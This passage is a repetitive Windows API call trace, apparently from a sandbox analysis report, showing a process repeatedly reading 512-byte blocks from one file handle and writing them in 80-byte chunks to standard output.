lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] GetFileType (hFile=0x4c) returned 0x1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] GetFileType (hFile=0x4c) returned 0x1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] GetFileType (hFile=0x4c) returned 0x1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] GetFileType (hFile=0x4c) returned 0x1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.357] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.357] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.358] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.358] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] GetFileType (hFile=0x4c) returned 0x1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] GetFileType (hFile=0x4c) returned 0x1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] GetFileType (hFile=0x4c) returned 0x1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] GetFileType (hFile=0x4c) returned 0x1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] GetFileType (hFile=0x4c) returned 0x1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] GetFileType (hFile=0x4c) returned 0x1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] WriteFile (in: 
hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] GetFileType (hFile=0x4c) returned 0x1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] GetFileType (hFile=0x4c) returned 0x1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.359] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.359] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.359] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.359] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] GetFileType (hFile=0x4c) returned 0x1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] GetFileType (hFile=0x4c) returned 0x1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.359] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0111.359] GetFileType (hFile=0x4c) returned 0x1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] GetFileType (hFile=0x4c) returned 0x1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] GetFileType (hFile=0x4c) returned 0x1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] GetFileType (hFile=0x4c) returned 0x1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] GetFileType (hFile=0x4c) returned 0x1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0111.360] GetFileType (hFile=0x4c) returned 0x1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.360] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.360] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.360] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.360] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] GetFileType (hFile=0x4c) returned 0x1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] GetFileType (hFile=0x4c) returned 0x1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] GetFileType (hFile=0x4c) returned 0x1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] GetFileType (hFile=0x4c) returned 0x1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, 
lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] GetFileType (hFile=0x4c) returned 0x1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] GetFileType (hFile=0x4c) returned 0x1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] GetFileType (hFile=0x4c) returned 0x1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] GetFileType (hFile=0x4c) returned 0x1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.361] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.361] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.361] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.361] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] GetFileType (hFile=0x4c) returned 0x1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] GetFileType (hFile=0x4c) returned 0x1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] GetFileType (hFile=0x4c) returned 0x1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] GetFileType (hFile=0x4c) returned 0x1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] GetFileType (hFile=0x4c) returned 0x1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] GetFileType (hFile=0x4c) returned 0x1 [0111.362] _get_osfhandle (_FileHandle=1) returned 
0x4c [0111.362] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] GetFileType (hFile=0x4c) returned 0x1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] GetFileType (hFile=0x4c) returned 0x1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.362] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.362] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.362] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.362] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] GetFileType (hFile=0x4c) returned 0x1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] GetFileType (hFile=0x4c) returned 0x1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) 
returned 1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] GetFileType (hFile=0x4c) returned 0x1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] GetFileType (hFile=0x4c) returned 0x1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] GetFileType (hFile=0x4c) returned 0x1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] GetFileType (hFile=0x4c) returned 0x1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] GetFileType (hFile=0x4c) returned 0x1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.363] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0111.363] GetFileType (hFile=0x4c) returned 0x1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.363] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.363] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.363] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.363] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] GetFileType (hFile=0x4c) returned 0x1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] GetFileType (hFile=0x4c) returned 0x1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] GetFileType (hFile=0x4c) returned 0x1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] GetFileType (hFile=0x4c) returned 0x1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] GetFileType (hFile=0x4c) returned 0x1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] GetFileType (hFile=0x4c) returned 0x1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] GetFileType (hFile=0x4c) returned 0x1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] GetFileType (hFile=0x4c) returned 0x1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.365] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.365] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.365] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.365] ReadFile 
(in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] GetFileType (hFile=0x4c) returned 0x1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] GetFileType (hFile=0x4c) returned 0x1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] GetFileType (hFile=0x4c) returned 0x1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] GetFileType (hFile=0x4c) returned 0x1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] GetFileType (hFile=0x4c) returned 0x1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] GetFileType (hFile=0x4c) returned 0x1 [0111.365] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] GetFileType (hFile=0x4c) returned 0x1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] GetFileType (hFile=0x4c) returned 0x1 [0111.366] _get_osfhandle 